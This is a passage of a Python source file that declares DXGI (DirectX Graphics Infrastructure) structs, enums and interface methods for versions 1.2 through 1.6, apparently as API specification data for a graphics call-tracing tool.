(BOOL, "ProtectedContentMaskedOut"),
(DXGI_OUTDUPL_POINTER_POSITION, "PointerPosition"),
(UINT, "TotalMetadataBufferSize"),
(UINT, "PointerShapeBufferSize"),
])
IDXGIOutputDuplication = Interface("IDXGIOutputDuplication", IDXGIObject)
IDXGIOutputDuplication.methods += [
StdMethod(Void, "GetDesc", [Out(Pointer(DXGI_OUTDUPL_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "AcquireNextFrame", [(UINT, "TimeoutInMilliseconds"), Out(Pointer(DXGI_OUTDUPL_FRAME_INFO), "pFrameInfo"), Out(Pointer(ObjPointer(IDXGIResource)), "ppDesktopResource")]),
StdMethod(HRESULT, "GetFrameDirtyRects", [(UINT, "DirtyRectsBufferSize"), Out(Array(RECT, "DirtyRectsBufferSize"), "pDirtyRectsBuffer"), Out(Pointer(UINT), "pDirtyRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFrameMoveRects", [(UINT, "MoveRectsBufferSize"), Out(Array(DXGI_OUTDUPL_MOVE_RECT, "MoveRectsBufferSize"), "pMoveRectBuffer"), Out(Pointer(UINT), "pMoveRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFramePointerShape", [(UINT, "PointerShapeBufferSize"), Out(OpaqueBlob(Void, "PointerShapeBufferSize"), "pPointerShapeBuffer"), Out(Pointer(UINT), "pPointerShapeBufferSizeRequired"), Out(Pointer(DXGI_OUTDUPL_POINTER_SHAPE_INFO), "pPointerShapeInfo")], sideeffects=False),
StdMethod(HRESULT, "MapDesktopSurface", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect")], sideeffects=False),
StdMethod(HRESULT, "UnMapDesktopSurface", [], sideeffects=False),
StdMethod(HRESULT, "ReleaseFrame", []),
]
DXGI_ALPHA_MODE = Enum("DXGI_ALPHA_MODE", [
"DXGI_ALPHA_MODE_UNSPECIFIED",
"DXGI_ALPHA_MODE_PREMULTIPLIED",
"DXGI_ALPHA_MODE_STRAIGHT",
"DXGI_ALPHA_MODE_IGNORE",
])
IDXGISurface2 = Interface("IDXGISurface2", IDXGISurface1)
IDXGISurface2.methods += [
StdMethod(HRESULT, "GetResource", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParentResource"), Out(Pointer(UINT), "pSubresourceIndex")]),
]
DXGI_SHARED_RESOURCE_FLAG = Flags(DWORD, [
"DXGI_SHARED_RESOURCE_READ",
"DXGI_SHARED_RESOURCE_WRITE",
])
IDXGIResource1 = Interface("IDXGIResource1", IDXGIResource)
IDXGIResource1.methods += [
StdMethod(HRESULT, "CreateSubresourceSurface", [(UINT, "index"), Out(Pointer(ObjPointer(IDXGISurface2)), "ppSurface")]),
StdMethod(HRESULT, "CreateSharedHandle", [(Pointer(Const(SECURITY_ATTRIBUTES)), "pAttributes"), (DXGI_SHARED_RESOURCE_FLAG, "dwAccess"), (LPCWSTR, "lpName"), Out(Pointer(HANDLE), "pHandle")]),
]
DXGI_OFFER_RESOURCE_PRIORITY = Enum("DXGI_OFFER_RESOURCE_PRIORITY", [
"DXGI_OFFER_RESOURCE_PRIORITY_LOW",
"DXGI_OFFER_RESOURCE_PRIORITY_NORMAL",
"DXGI_OFFER_RESOURCE_PRIORITY_HIGH",
])
IDXGIDevice2 = Interface("IDXGIDevice2", IDXGIDevice1)
IDXGIDevice2.methods += [
StdMethod(HRESULT, "OfferResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), (DXGI_OFFER_RESOURCE_PRIORITY, "Priority")]),
StdMethod(HRESULT, "ReclaimResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), Out(Pointer(BOOL), "pDiscarded")]),
StdMethod(HRESULT, "EnqueueSetEvent", [(HANDLE, "hEvent")], sideeffects=False),
]
DXGI_MODE_DESC1 = Struct("DXGI_MODE_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Stereo"),
])
DXGI_SCALING = Enum("DXGI_SCALING", [
"DXGI_SCALING_STRETCH",
"DXGI_SCALING_NONE",
"DXGI_SCALING_ASPECT_RATIO_STRETCH",
])
DXGI_SWAP_CHAIN_DESC1 = Struct("DXGI_SWAP_CHAIN_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(BOOL, "Stereo"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(DXGI_SCALING, "Scaling"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_ALPHA_MODE, "AlphaMode"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_SWAP_CHAIN_FULLSCREEN_DESC = Struct("DXGI_SWAP_CHAIN_FULLSCREEN_DESC", [
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Windowed"),
])
DXGI_PRESENT_PARAMETERS = Struct("DXGI_PRESENT_PARAMETERS", [
(UINT, "DirtyRectsCount"),
(Array(RECT, "{self}.DirtyRectsCount"), "pDirtyRects"),
(Pointer(RECT), "pScrollRect"),
(Pointer(POINT), "pScrollOffset"),
])
IDXGISwapChain1 = Interface("IDXGISwapChain1", IDXGISwapChain)
IDXGISwapChain1.methods += [
StdMethod(HRESULT, "GetDesc1", [(Out(Pointer(DXGI_SWAP_CHAIN_DESC1), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetFullscreenDesc", [(Out(Pointer(DXGI_SWAP_CHAIN_FULLSCREEN_DESC), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetHwnd", [(Out(Pointer(HWND), "pHwnd"))], sideeffects=False),
StdMethod(HRESULT, "GetCoreWindow", [(REFIID, "riid"), (Out(Pointer(ObjPointer(Void)), "ppUnk"))]),
StdMethod(HRESULT, "Present1", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags"), (Pointer(Const(DXGI_PRESENT_PARAMETERS)), "pPresentParameters")]),
StdMethod(BOOL, "IsTemporaryMonoSupported", [], sideeffects=False),
StdMethod(HRESULT, "GetRestrictToOutput", [(Out(Pointer(ObjPointer(IDXGIOutput)), "ppRestrictToOutput"))]),
StdMethod(HRESULT, "SetBackgroundColor", [(Pointer(Const(DXGI_RGBA)), "pColor")]),
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: Flags
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
